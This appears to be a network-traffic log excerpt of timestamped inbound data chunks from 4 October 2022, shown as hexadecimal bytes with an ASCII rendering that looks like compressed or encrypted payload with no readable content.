                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28632INData Raw: 96 64 1d 78 aa b7 dc 11 c4 6c c6 2a e2 3f bc 89 b0 99 a7 f1 c9 2f 3c e1 e3 16 43 2b 9e 1f f1 57 bf 09 8b a4 37 63 a7 ae 51 0d b6 97 0f e8 55 3c e0 75 91 3b 1c 75 b9 78 b7 54 a2 49 33 3a e7 d1 27 7d 76 fd 20 b0 dd 58 46 9a 35 2f 81 5f 62 92 2c 5e c4 33 5b fe 6f c8 38 ff 24 5c db 29 19 15 2a 24 06 80 80 e2 25 98 22 c5 eb 0d 60 2f 06 ea ed 53 ba 27 a4 e6 d8 f1 54 6c 49 4d ef 34 e2 b0 29 cc 23 61 2a ac 45 25 ae 7d ef 48 24 f6 b5 28 a6 64 1f 20 df 68 00 e3 e9 c1 14 9e 46 ed 9d 20 5f be 90 bf 41 6e a9 2f 33 fd 71 4d fe 88 c8 8a 17 d6 68 72 5f ef 3f d4 79 2e c2 33 84 34 ce af 6e eb 2c e6 2c a6 fd 85 c2 38 0d da 02 42 de 36 43 c7 a1 5d a2 6e e0 c0 da f5 dc ac 0d b9 80 ea 19 82 b9 38 0e d0 ca 37 dc 78 3c ab 6a f7 50 ba 5c 7b 9d 65 ca 44 92 39 7e 6a 71 be 58 79 64
                                                                                                                                                                                                                                    Data Ascii: dxl*?/<C+W7cQU<u;uxTI3:'}v XF5/_b,^3[o8$\)*$%"`/S'TlIM4)#a*E%}H$(d hF _An/3qMhr_?y.34n,,8B6C]n87x<jP\{eD9~jqXyd
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28648INData Raw: 4a 03 00 e4 3f 28 7e 35 b0 51 6e 33 e4 4e e9 d1 09 a0 bb 63 e3 0d a9 06 c0 73 09 9b 28 42 8a de 30 1d df 70 08 7b 93 b0 d0 7f ff 14 74 72 a4 4f ff 26 82 39 ea e8 45 40 9d 03 22 82 65 35 c3 60 3d fe 8b 84 59 a8 6d 30 ad ed fe 19 8d a1 ae 29 a5 26 52 0e 42 55 3b 63 b7 34 8c 26 bf ce 40 0e 59 b2 8b f2 70 67 d7 be c9 45 14 26 83 e3 51 5a f0 2d 51 0a 4a ac a8 4e 26 9d 67 2d 3a 45 81 6e 5a 99 7d a2 1c bb 62 ec 92 03 19 ea ff 8b 95 ad 23 d6 32 dc 7f a6 ca e8 fa 95 27 ac bd fe d0 55 e9 54 45 a1 a6 e1 17 65 b3 65 ac e2 82 71 ef 23 77 ef 7a 62 ad 78 a7 ae 45 3c d8 0e 4b 38 d0 b1 48 fc c7 9c 9b c7 76 83 21 8d cb fd 12 5a 93 7a 07 0e 0e 3b 4e 3a 76 8e f0 dd c3 29 42 84 ca af 3e 10 6a f0 61 a2 05 75 79 3b fe 3b 4b 79 9e 51 db d0 2e b9 95 75 c4 b4 14 a8 b7 26 96 24 c4
                                                                                                                                                                                                                                    Data Ascii: J?(~5Qn3Ncs(B0p{trO&9E@"e5`=Ym0)&RBU;c4&@YpgE&QZ-QJN&g-:EnZ}b#2'UTEeeq#wzbxE<K8Hv!Zz;N:v)B>jauy;;KyQ.u&$
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28664INData Raw: 27 25 6a 76 1b 91 37 3e b6 21 de a7 39 51 d8 64 04 21 47 a7 06 61 bb 56 96 b0 97 c8 79 30 ae e8 dd 4f cb 4b c5 04 62 93 fc f6 46 7a 67 f5 d6 2a d3 80 ff b4 54 02 1f 21 78 6a 23 fd f8 58 2c 06 3d 4e 8f 48 ae 27 48 27 65 71 5e 28 d5 b6 29 4a 7c 7c 6c 54 23 8c 75 3d 82 c6 d6 69 68 a1 4b c6 a8 7d 9d 13 fb bb 6d 2d 6e d8 0d d1 d9 80 e4 f9 6b 36 f9 0f 24 7a b7 40 a9 23 d1 d5 2e 8c 6a 2c 23 16 d0 78 a2 8b a6 36 f9 3c 4a 90 ed 9d fe b2 44 06 e5 1f 03 00 7c 9a 07 25 56 1e c9 04 60 6a 02 ba 53 46 06 67 d4 d7 1b e5 a9 e9 be b8 dd 81 55 85 3d da a7 72 ba c4 23 5e 3a 4d 2a 40 d2 5b 22 97 59 ea d4 67 8c 6e c2 53 3c f2 d0 ce b3 fc 4d 20 a2 17 9f fe 05 cd 9a 65 65 ca 90 5b db fc fe 53 5f f6 c3 b6 84 5b c8 c2 3e a5 2b 0f 75 f4 99 37 49 eb e9 dd 17 25 05 8a b4 ba a5 12 45
                                                                                                                                                                                                                                    Data Ascii: '%jv7>!9Qd!GaVy0OKbFzg*T!xj#X,=NH'H'eq^()J||lT#u=ihK}m-nk6$z@#.j,#x6<JD|%V`jSFgU=r#^:M*@["YgnS<M ee[S_[>+u7I%E
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28680INData Raw: 8d f1 2e 80 ba 41 fb 96 12 aa 3f 02 17 03 be 2f 59 33 6f 12 54 04 ec be 2c 6c b5 23 6f 3f 09 3c f5 2e fe 78 3c b8 12 bc 61 b3 7f 1d 9b 73 69 1d 11 7b 93 c9 77 05 74 80 48 8b b5 94 80 5e 68 72 3d df 25 7f 85 7c b8 ad fd 9c 59 59 4d 0c ca 29 dd 50 e4 48 58 07 0b 45 8c 20 aa 02 bf 33 45 86 5d 28 5a 1f b9 8d 14 c0 6f c7 d4 8f 70 66 44 bb 38 b1 e2 50 84 3c 87 84 98 a9 6f 2c e7 82 cc 79 59 4c 9e bf aa 32 08 30 1e 4a ac 1b 4c c4 4a e6 2b 7d f4 63 f4 84 b7 9f 05 5b e5 25 bb e0 80 c8 c3 ca a1 f4 67 2c 91 a7 62 6e 85 af 80 be b5 f4 08 0f a8 a2 d7 10 76 9c 2b c1 e6 c5 99 04 70 a6 81 b4 ef f1 02 8f ac 8e 3b e3 96 e3 c1 41 d9 e1 ea e4 47 5c 41 49 e2 5d 08 57 df 76 f3 71 3a 59 0e a3 ab 1c 00 c5 73 e4 2f 01 a7 d0 d3 89 9a c8 48 b0 56 79 1e 70 57 0f a4 d6 af 03 86 65 9e
                                                                                                                                                                                                                                    Data Ascii: .A?/Y3oT,l#o?<.x<asi{wtH^hr=%|YYM)PHXE 3E](ZopfD8P<o,yYL20JLJ+}c[%g,bnv+p;AG\AI]Wvq:Ys/HVypWe
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28696INData Raw: 49 b2 c7 20 5e 6b 4e 65 eb 54 b7 83 d3 6f 68 f6 c1 34 21 10 16 8d dc b4 56 e5 dd c8 d7 03 42 9b d5 a4 1f 85 c9 f9 90 8d 77 59 a8 b0 09 71 80 1c 07 ec 84 10 6a cb 20 b0 66 32 3f ae e3 66 ee 67 8d 6e dd 66 8a fa d2 9b 38 32 b2 f8 62 11 60 ab 0c 7f 32 08 d6 e7 46 1a ac a4 8d 02 53 76 c2 ff bc f4 88 73 c0 ef 4b 2e c0 41 99 c7 d3 cc 62 7c ac 03 0a 3e 53 18 83 e2 ce e2 88 d0 9e 48 89 e0 1d 77 ba 24 8f 3b 3c ed 46 96 6e 3a 6e 86 6a e6 a4 66 dc 6d c8 fd bd 15 c1 dc f7 28 f7 a4 c3 47 db e1 6d 70 13 14 36 0c ed 7a cb 4c 97 68 1e b5 63 96 bd 19 9e 48 0a aa 7d e9 79 e8 d9 56 6f ff 23 00 fa 17 f4 70 87 44 4a d8 93 35 38 fa eb 7b 3e c8 34 b6 0a 56 b2 2d 46 b8 66 b6 36 75 a8 e5 c1 73 0b 66 74 4a ec 70 42 89 6a 96 fd 8a 29 38 15 1e 12 b3 f8 d0 13 14 03 49 49 53 37 6c 6f
                                                                                                                                                                                                                                    Data Ascii: I ^kNeToh4!VBwYqj f2?fgnf82b`2FSvsK.Ab|>SHw$;<Fn:njfm(Gmp6zLhcH}yVo#pDJ58{>4V-Ff6usftJpBj)8IIS7lo
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28712INData Raw: 2c 22 91 62 0f 66 df 2f 69 68 3f f7 72 4f 02 2a f5 1a 81 6b fb bc 66 91 52 db a7 26 09 37 8d 2f da 53 ea 2e 6b d8 40 33 e7 69 01 a8 59 74 f6 f7 5b 9b 9f d9 51 76 6c 3c 9c 4f 8b 00 75 45 ca 33 fc 54 41 42 af 7a 8b 5b ce e4 33 c7 c8 75 de 9a 4b 49 58 97 ad ab 9b c6 c5 de 59 8d 0a 5e a5 ab 3e 13 77 fb 12 c3 7e d3 04 4d 9a 9a 1f 8e cd 8a ed c1 24 bf 3b d5 45 37 32 5b 8e 2f e9 8d c5 a6 ba af f6 de f4 b3 47 40 02 dc 14 ae 12 d2 dc f3 e2 2f d3 d8 08 8d aa fb b5 1a cd d1 f7 70 6f 0f 9c 21 c9 26 2a a2 90 b6 a8 ee 2e 06 c5 fb 83 1b 39 6c 84 e0 a2 fc bd f3 79 84 06 8c f0 51 2b 8d 4c 73 7a c0 65 fc 3b 2c 1a 93 f9 9a 68 65 1c f7 de 11 24 b0 5a a1 32 98 27 ef b6 55 20 89 5e ee 85 8b eb 11 25 3d d6 7c e1 1c cc 32 f2 3a 10 50 ac 3f fe 66 dc a3 21 9a 4a 1f c3 91 93 f9 51
                                                                                                                                                                                                                                    Data Ascii: ,"bf/ih?rO*kfR&7/S.k@3iYt[Qvl<OuE3TABz[3uKIXY^>w~M$;E72[/G@/po!&*.9lyQ+Lsze;,he$Z2'U ^%=|2:P?f!JQ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28728INData Raw: 59 fb 76 5a 60 e5 c4 c3 76 03 eb e0 af c2 44 28 41 cd 4f 9b 13 52 e1 8a 5e be 33 1b 35 13 07 54 6f 21 ed ab df 62 fe 41 52 e7 18 c4 f5 82 30 04 cc 56 0d 4c b0 fa 50 cd 67 02 fb 25 32 d6 c1 75 bd 9c 7c 08 5b ac d7 97 20 40 a2 9f 93 00 3c d7 99 ea ef 25 f9 30 c6 aa 85 ed 73 4f 7b af ca cd 6a 43 71 6d 74 a2 bc 6f a7 86 7e 68 87 f7 8c e8 7f cf db 24 ae a2 22 b1 63 2f b4 5f c6 d2 bb 7c 70 58 09 62 1f 39 b3 6d 85 3c 7c 34 c2 c9 6a 33 8b 45 c9 67 a1 92 ef 65 ca 12 3c aa ce 77 39 29 51 41 e5 cb e0 90 c8 28 8b 6d 1d e5 41 3c 7b 92 e8 1d 88 b1 de 90 19 1a 73 1e c9 26 65 37 74 fa 75 aa fa e8 02 9e 9c 96 49 22 f3 39 ff 46 ab 89 77 a5 72 b2 e3 c1 c7 db 4f e4 04 4a f2 c5 18 ae 05 54 93 7d 6d 5f dd f4 0b 4b dc 04 c4 64 9a 51 46 22 9b 24 01 e0 95 1b ac 9d 23 08 0b 83 27
                                                                                                                                                                                                                                    Data Ascii: YvZ`vD(AOR^35To!bAR0VLPg%2u|[ @<%0sO{jCqmto~h$"c/_|pXb9m<|4j3Ege<w9)QA(mA<{s&e7tuI"9FwrOJT}m_KdQF"$#'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28744INData Raw: df f3 89 c0 70 ea bf 8a f7 a3 0f 2d a0 33 c9 42 0c 36 66 85 5b 6c d9 f5 2f a5 ac e0 8f 26 2e b0 18 30 f7 8f 5a bc 08 67 94 9a 5f c1 00 fe 2c d5 87 a1 63 a7 f6 14 32 7d b8 b5 cc d6 47 f8 85 53 c5 03 05 b6 07 d7 dd fb d7 b0 f1 1e 00 61 e2 7c 86 09 1d 4e 03 cc 27 64 13 31 0a 62 55 37 67 3a bf e5 f9 bb 99 f2 b9 7e 21 76 48 c4 da fc f5 a8 83 43 5d 4b 2b 4a 52 d1 c8 ea 3b 4b 0a c1 a5 9d 58 06 ec fb d6 fc 85 e8 55 5f d7 cf a6 6d 00 35 75 c6 ed b6 e9 95 c0 14 da 6e 70 b5 92 ce 47 ce d6 9f 71 7c d8 4b 66 48 22 48 29 64 3d 44 56 08 25 c2 32 c9 89 a7 a0 63 02 75 be a1 e0 2c 58 06 02 c8 5d 26 1f 00 ac cc af 31 ac c4 ce d2 0d 2c 94 21 f0 96 20 e3 f0 2a b3 0b e8 e6 f6 2a 68 72 24 ba 95 24 2c 69 07 08 72 3b 74 66 a1 97 98 76 9d d5 3e a8 a8 d5 07 80 f8 7c d5 be 26 34 23
                                                                                                                                                                                                                                    Data Ascii: p-3B6f[l/&.0Zg_,c2}GSa|N'd1bU7g:~!vHC]K+JR;KXU_m5unpGq|KfH"H)d=DV%2cu,X]&1,! **hr$$,ir;tfv>|&4#
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28760INData Raw: 30 bb 5a 9e 0d 66 7a 93 fa e7 b7 a5 57 88 ac aa e8 b2 00 eb de 58 93 61 c6 b7 cd bb 33 0e b8 41 45 fc 30 f3 60 b9 f2 1d 5b 90 12 ae 18 2e 63 06 32 f6 b1 f4 7a 45 e9 1f b5 e8 c5 9c 48 a3 7a 22 b7 98 2a c7 d5 20 54 13 bc ad 33 34 a9 6f a9 90 4b fa 9e f4 05 3d 72 2b 2a eb c8 31 d7 21 76 9f ea ad 67 ed 1c df 12 b1 d0 b6 2e 1b 7c 49 58 0a 8b af 68 70 0a e6 42 f3 b9 22 e0 59 6d 6b 92 ca 29 bb 92 e0 0a 23 6e a1 3f 29 f4 09 7f 19 e3 e1 43 bf 08 ea 77 b6 89 ff 93 dc aa 42 ca a1 f6 fe 1a 12 4d 17 c7 8a 19 e4 53 1d 83 e1 cb c0 04 2b 47 9a 06 4c 13 88 c2 98 95 a5 fc 1c f6 b1 5e 77 d7 7d 38 04 92 32 6f 55 75 ba 6a d1 f3 cd 0d 57 64 85 6d 6b 53 85 51 83 7c f8 ba f2 62 eb e8 57 bb 92 89 dc 34 01 58 2f 92 bb 53 93 90 77 0c fd 88 7d ea e0 a1 41 bd fe 24 88 bc 51 ae 6f c4
                                                                                                                                                                                                                                    Data Ascii: 0ZfzWXa3AE0`[.c2zEHz"* T34oK=r+*1!vg.|IXhpB"Ymk)#n?)CwBMS+GL^w}82oUujWdmkSQ|bW4X/Sw}A$Qo
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28776INData Raw: 80 f7 02 c4 d3 11 34 22 9a 1e 72 f2 e6 98 8a da 9c 23 46 68 95 5b 9e 81 39 e4 73 4e 97 dd cb 13 f4 b6 53 f3 08 19 35 76 16 4e 04 cf fe f2 ee a5 9d 36 7d 68 79 30 bf 77 41 85 84 40 b5 48 36 32 88 a9 87 f3 38 df 24 41 3c 00 19 a9 6f 0b f5 e8 e4 26 51 1f 54 69 b5 4a a7 cf 91 a0 8a 44 36 ce 4d fa 80 0c 81 84 fa fb 7d 3d 88 84 0f 5a cb cb d4 71 9a 77 f9 2c 35 e3 42 70 bd a3 bf 06 e5 43 6b 17 1c 5b 0c 5a 56 6e fc 58 1d dc e8 7a 04 72 9f b8 d2 02 15 85 43 cb 50 9f 5d 65 84 f7 ea 88 76 a9 18 2a c6 b6 38 6f ec e8 5b f5 be a1 2c bb 14 a7 29 1e e8 64 1d 1d 4c 42 7a 94 48 24 62 89 9d c7 8b 61 96 fe 18 2d 3a a3 be f8 63 b7 2a f7 e0 c3 85 4e 4e 22 2d ea 08 8d 60 b4 1a c5 8b 52 d2 06 63 65 f6 5f 1d e1 56 82 c5 55 69 2f bc 5a 56 94 64 c5 0f c3 72 5b 56 98 61 47 03 0b 29
                                                                                                                                                                                                                                    Data Ascii: 4"r#Fh[9sNS5vN6}hy0wA@H628$A<o&QTiJD6M}=Zqw,5BpCk[ZVnXzrCP]ev*8o[,)dLBzH$ba-:c*NN"-`Rce_VUi/ZVdr[VaG)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28792INData Raw: 83 89 19 3c be 6d 7b 0f c0 45 38 da be 6e 4e 08 fa a1 84 6d 88 33 95 7c 37 d4 dc 28 1e ca 2e 4d 7d dc a8 8b a2 7f 0f cd 1f e3 7d 2c db c2 5e 52 c0 5b dd 02 a9 a1 be fe 79 06 0c 60 70 31 71 3b 93 26 cf 9b 31 fc 9f 14 52 5b 9e 55 d1 ea f6 4d a8 e4 84 de 66 fb d4 c4 db d6 a0 e4 c0 86 a0 6a 79 03 c0 d8 9a 21 ec 17 af 9a 4e c0 02 d6 e3 15 6f 94 a8 85 48 75 22 df 23 69 05 f1 b1 c8 7d d2 34 75 20 49 d2 5f 84 dd ce 94 6f 2f 35 40 bb c1 be 6e 6c 9d ed ed e3 00 de 35 c1 ad 40 96 f8 51 bd f9 e7 a9 fc 7d de 34 96 e0 d7 d5 f8 53 f3 92 82 d0 76 df 30 ff 24 2a 7a 54 ea 32 97 74 7c cb 02 15 89 d1 d5 7d 8d 0a 14 52 0c 39 d4 fa 4d 34 07 86 9d 93 ea 63 e5 75 76 60 f1 6b 92 a6 b9 60 94 67 cf a7 27 fe 43 2b e7 e0 ce 2f c0 2d 19 3b 88 b7 3a 23 8a 51 ea ce 32 ae f0 2a b1 75 03
                                                                                                                                                                                                                                    Data Ascii: <m{E8nNm3|7(.M}},^R[y`p1q;&1R[UMfjy!NoHu"#i}4u I_o/5@nl5@Q}4Sv0$*zT2t|}R9M4cuv`k`g'C+/-;:#Q2*u
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28808INData Raw: 90 01 51 7c 87 28 18 5d 64 6a 8f 7e 5d 93 28 9c 5f 39 2b e5 51 15 e5 7f 0d 26 c6 2e 35 be 3d af 9f 9a 3a 1b 82 c9 17 e8 11 ef 19 5f 25 84 cc 7c 1f d5 09 f9 4a 1a 6f df 6d cf e0 5f da d7 42 af 7e ab 2c 8e 8b c4 19 26 19 8f ec 2e 26 ac 8b 37 7f 4f 96 76 ec f9 de 81 3e 81 35 f3 cc 45 6b 37 d8 e1 e6 ad 24 17 2f a4 2d b3 e0 21 f3 15 50 84 01 d2 33 a8 83 1b 2e df 47 e6 c8 4e f8 20 3a 80 56 d4 c4 be a0 23 c0 b6 83 c0 82 05 9e cc 38 5c d6 95 2e ef fd 4a d2 94 28 d8 ac 40 69 32 70 de 40 a6 65 bd 96 c6 c2 9b 9a 9c e5 d9 3e 49 dd 87 39 9d 30 a5 ae 2b c2 4e 57 96 b7 56 7d bb 26 4e 7e b0 07 44 1d d9 9c 3f 96 16 db 99 27 15 53 d1 e7 a4 c8 e4 60 7c 52 c2 cd 05 67 f3 33 63 63 7e 14 73 ca de 4f d5 2b 5b 29 4f 6c c1 c4 f1 fc cd 86 cb b7 db b4 c9 fd 83 15 d6 86 fb 6c 54 c2
                                                                                                                                                                                                                                    Data Ascii: Q|(]dj~](_9+Q&.5=:_%|Jom_B~,&.&7Ov>5Ek7$/-!P3.GN :V#8\.J(@i2p@e>I90+NWV}&N~D?'S`|Rg3cc~sO+[)OllT
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28824INData Raw: 29 f7 e9 90 c1 11 40 32 b6 69 3f cf 79 d2 f4 4f c5 07 f0 ab 54 22 d0 2e c4 66 28 92 a2 1d 5f f7 a6 ac 17 09 87 b5 15 df 4b 4e 78 31 fb 3b d8 c1 c3 05 ef 2a bc 51 28 50 60 3d 67 a8 ba 79 38 49 4e 8c 15 b6 15 24 cf 7a 84 20 c3 7c 47 0e 8e 8d 6f 25 b4 54 1b 14 f7 30 3c f2 1d 90 03 20 29 9e d6 50 e2 4c 82 72 44 94 78 f2 0a c1 b1 fe db 9c 9c 0b e7 14 49 3a 31 75 f3 1e f3 b0 40 34 a7 d6 fb a9 94 da 5c e0 a6 55 84 d3 f0 64 8c 1e 57 06 6f c6 f9 2d ee 9d ff 7c bb 0a f6 92 73 8a b4 5a 2e ef c0 b7 f8 3e 4c dc 98 55 d4 b9 88 50 95 bc c6 87 3f cd 83 48 a1 09 5f 2b b2 a8 52 97 d3 4a 8f 1b 15 19 3a 29 23 a8 39 04 17 80 85 44 bd 41 1f a8 62 85 0f ef e2 9b 98 5a b6 40 4d fc 43 e8 ea 1f 56 71 2d d6 d3 19 af 43 87 b9 fd d2 b1 bc 33 47 1e 01 cc 04 f5 5a 3d 56 25 7b fa 8e d1
                                                                                                                                                                                                                                    Data Ascii: )@2i?yOT".f(_KNx1;*Q(P`=gy8IN$z |Go%T0< )PLrDxI:1u@4\UdWo-|sZ.>LUP?H_+RJ:)#9DAbZ@MCVq-C3GZ=V%{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28840INData Raw: 61 45 e7 16 6c 2c fa 79 fa 1d b8 86 57 44 11 9d 0c 9c 65 f2 09 cf ec bb d9 e3 29 90 6e 53 dc 17 3d a6 be f1 52 96 99 38 e1 4d 1b 5d de 37 27 2a 11 b6 06 5a dc 2d 12 a9 bd fe b5 27 c4 1b c9 a3 e0 de c5 92 bc f9 77 d2 73 06 59 9b 3b 94 fe 03 04 0d 41 3b d5 7a df f3 ac 6b 53 2e 92 72 24 45 8b 2a ce 79 77 63 12 fd f4 7a e2 35 c2 6d d2 d6 e3 d5 3b 6e 2b 59 b9 a4 d9 77 cd 71 79 c7 48 62 97 c5 7e 5f 0d 8d 8f 78 e6 89 f4 0d f8 fb ab c5 dc 27 a1 c5 1b 34 2c e5 bb a4 ca 41 84 82 03 d9 06 73 ce c2 73 a7 f1 6b 2d 97 58 a8 44 ca d2 f4 a9 27 13 f5 ab b7 da 4b 7d 60 2f 43 9a 1d f8 2d c1 c9 bb b6 60 e8 7f 5a 7a 10 0f bf 06 bd 23 f1 ba 18 ba ad bf 11 d4 ce df 44 65 5e f7 1f 2b 21 16 fd a8 1d e9 1f a5 01 a5 81 cb b3 9a 97 17 bb 7d dc c8 de 87 c0 76 bc d5 ea 5a fc 1b 59 dc
                                                                                                                                                                                                                                    Data Ascii: aEl,yWDe)nS=R8M]7'*Z-'wsY;A;zkS.r$E*ywcz5m;n+YwqyHb~_x'4,Assk-XD'K}`/C-`Zz#De^+!}vZY
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28856INData Raw: 48 f2 07 3f 47 31 4f 0a ba 88 db 93 2b ac 9e 2d e3 04 53 b2 78 eb f1 6a ad 8b 21 35 ea 6b 3d 1a c0 25 e2 53 c4 47 d9 71 33 46 0f 7b a7 f8 27 71 5e 20 f5 61 04 4b bf 53 1b 3e 95 b7 5f 4c 9d 47 8a 98 07 22 9c 77 92 ec 99 52 34 39 e5 20 0c 3b 8c 15 a7 af b6 e5 58 6f 2e bd b3 fa 34 42 88 75 4a f5 ec f4 15 82 0f 07 bf 27 21 cd cf 40 bd 76 db 84 b4 6e 90 42 99 56 47 29 94 27 0e 30 bd fa bd 6b fd 5b 16 9a 92 d5 76 60 25 1f 89 d0 71 d5 a7 01 c0 b0 03 b3 3a 45 7d f8 36 c5 79 bc 3e dd 84 62 79 16 8f 79 00 74 12 9c f2 1f 99 4f 12 6f f6 a8 46 33 50 67 8e 63 e7 e9 0d 41 13 f7 06 be 8f 19 38 6e 74 4b 32 5a 1d cd 5f 00 d2 a0 7d cf 76 14 91 e0 d3 03 5a fc 11 34 b5 4a 64 d3 cf e2 eb 65 4b 96 56 b4 24 6e ce 15 fe 3b 28 81 1c 63 a5 8f 32 b5 1e 8b 5f e1 21 d7 22 eb 64 fc 61
                                                                                                                                                                                                                                    Data Ascii: H?G1O+-Sxj!5k=%SGq3F{'q^ aKS>_LG"wR49 ;Xo.4BuJ'!@vnBVG)'0k[v`%q:E}6y>byytOoF3PgcA8ntK2Z_}vZ4JdeKV$n;(c2_!"da
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28872INData Raw: d2 58 92 b9 84 cd 93 ec 02 eb 81 ab 62 bc 36 38 a4 56 57 52 b8 8f 16 9a 12 05 01 3b 07 6f 84 10 d7 e9 88 2f 4e 6a d3 26 a7 7b 50 f2 d2 f1 2d cd 39 47 55 e9 41 65 fe 16 18 f7 4b 19 2e 93 ac f2 6f 42 ec 79 53 26 6f a6 42 c3 f7 0f e8 5b 5e ec 1a a6 71 f7 04 03 88 14 8c 0e a2 54 61 9f 5f 29 9f 7e aa 5f af a6 81 93 85 88 24 b4 53 6b 7c 81 cc 01 84 80 a1 2f 5b 0f 50 ee 32 b3 77 7a c1 4a b3 00 29 d7 86 9e 1b 72 bc 21 f5 af 81 12 c2 d7 cb 6a f9 73 3d 25 2a 88 a3 bb 84 22 fe f4 f8 27 73 27 d6 0e 1f 7d e6 c9 40 e3 68 1f c5 3a 03 b3 b7 d7 2b f0 6f a5 6f 40 d9 8b cc 48 22 33 9b 4c 04 11 66 fd f0 f8 66 ec 40 e8 e5 0b 71 d8 f4 a1 2a 8a 8f ca 02 19 70 88 35 82 0d 90 cb 48 27 19 04 a4 b1 cd 05 a8 90 e1 4e b2 96 0f a8 fc e7 92 1e 78 74 7b fb 72 5d 1f 72 2d 2b 19 05 b8 a8
                                                                                                                                                                                                                                    Data Ascii: Xb68VWR;o/Nj&{P-9GUAeK.oByS&oB[^qTa_)~_$Sk|/[P2wzJ)r!js=%*"'s'}@h:+oo@H"3Lff@q*p5H'Nxt{r]r-+
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28888INData Raw: dd f5 2a 55 da 8f d0 74 dd 8c d8 f7 6c 66 c5 1b 67 a3 67 23 20 56 b0 b1 a1 1e fe 43 04 2c 16 9d fa 34 f8 c8 7c d4 40 9d 37 3c 0c 25 e1 9f 1f 91 9b e7 69 d0 81 33 ea 37 6e 24 b6 ea 45 69 a6 06 ce 37 27 de 14 94 01 e5 a0 2e 18 12 d0 65 e4 88 8a 3d 1a 5f c5 23 62 3a 73 46 52 a7 a3 bf 23 e1 c8 a1 70 4e e8 94 2b 9d 05 a3 cc 14 4d ac e9 7b 98 af 0e 43 8a 2a f7 69 f3 49 20 8b cf 12 be f0 35 d1 b1 3d 60 48 5c ed 94 61 16 1f d9 6f 30 95 39 b8 ff c9 37 cd 3a 64 fc 7a 4c 36 f8 f3 30 eb a0 14 17 34 a1 28 e0 c2 64 74 04 96 1e 01 a2 4a 2f cf 7d bb 39 30 d9 87 06 3b be f6 c8 49 06 16 52 9c 01 e5 04 2e c3 38 99 86 02 4f 96 a0 bd 47 3e c1 cb 8f 49 61 18 3f e2 77 5e 88 03 a2 cb 58 5c bd b8 d6 18 4d 03 da ee d1 1c bd ab f8 2f e8 0c 66 f5 79 eb eb f5 4c db 2c e2 ae 44 db 6d
                                                                                                                                                                                                                                    Data Ascii: *Utlfgg# VC,4|@7<%i37n$Ei7'.e=_#b:sFR#pN+M{C*iI 5=`H\ao097:dzL604(dtJ/}90;IR.8OG>Ia?w^X\M/fyL,Dm
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28904INData Raw: 34 a4 ba 4d 76 88 58 14 38 fb 2c 03 4e 83 66 2d cf a8 a2 10 48 7d 9c 91 5a 38 2e 19 10 ab 7a 15 8d 0f f7 b2 0c 51 25 5a 3d 0d db 3c ac e6 fb 7a 2e 2f f4 19 93 0f 71 30 35 7d 34 b3 bc 4a 79 30 e8 72 47 60 30 dd c3 64 d4 58 ac 26 09 6f 36 81 3b 05 1a c0 34 a3 af d7 7d e1 f5 c1 29 71 02 cf 0d 50 a0 e1 69 7e a2 ee 65 b1 79 30 12 ed c1 3a bc 86 7d f9 3b 81 25 d8 d6 70 b1 cb 78 3b 42 f2 5a b5 23 0f 8f 3f 4d 82 a6 d2 90 c9 04 40 b0 80 cf fc 6e aa f2 2a 59 92 60 ce b2 0c d7 ff 65 a0 47 09 a8 af 19 b4 dd 6a 53 3f 28 fd 6c 45 6a 37 e9 7e ca 49 23 c5 b4 49 c7 6a c3 4e c2 54 bb df 12 b3 a8 39 03 64 69 6b d9 a1 08 7d a2 e2 60 7f 26 82 c4 8b f2 d9 4d 12 7b 2a ae 1a 70 b9 f0 3d fe 13 3c df 43 aa 6e 7d 80 d9 72 32 66 d3 56 94 48 32 ac a0 ee ba e8 c0 35 95 c5 94 75 2c 83
                                                                                                                                                                                                                                    Data Ascii: 4MvX8,Nf-H}Z8.zQ%Z=<z./q05}4Jy0rG`0dX&o6;4})qPi~ey0:};%px;BZ#?M@n*Y`eGjS?(lEj7~I#IjNT9dik}`&M{*p=<Cn}r2fVH25u,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28920INData Raw: fa b5 0d 6f f3 e4 03 43 04 b7 df ca 80 67 64 27 26 24 be 73 a8 a2 3b 5a ef de 98 10 21 d8 5e b9 5f 7f fd 68 9a c8 32 23 28 41 a9 61 fa e5 c3 44 b3 7a c7 a6 ca 1a 74 49 11 18 5a b7 66 df 7b f1 01 ec fd dd f5 f3 6a c4 13 73 57 9e 96 ab 39 c0 c6 14 bc 25 e7 e0 16 f1 a3 8f 3a 1b ee 8e 13 cf ae 3e 7d dd 64 43 97 11 34 8b 7c 74 f3 8b 9b f3 b4 82 4c 1a f2 63 75 07 ba e4 58 9d 46 6e 68 96 d9 bf 0b 16 db ce d6 06 3c ec 23 96 ea de d9 a8 35 91 a1 07 4c 17 a0 54 9d cc 8f 33 d8 ad e1 a4 e7 4a 5c b5 b9 9c ba 7c c5 f4 92 f9 c6 73 61 ce 59 1a 63 f5 8f d6 81 a8 3a c2 69 bb 19 c7 b5 88 04 cc f1 91 e4 5c f4 f5 12 e9 1c e8 4b 59 d8 62 d5 9f bb fd fa a1 02 b5 46 6a 43 e4 b1 d0 1c a3 c0 a4 de 6d 04 12 b8 55 87 ec 3a 44 65 db ae 82 ac 6f b1 bb e2 e1 fd f3 d9 c7 d1 50 d8 b3 b6
                                                                                                                                                                                                                                    Data Ascii: oCgd'&$s;Z!^_h2#(AaDztIZf{jsW9%:>}dC4|tLcuXFnh<#5LT3J\|saYc:i\KYbFjCmU:DeoP
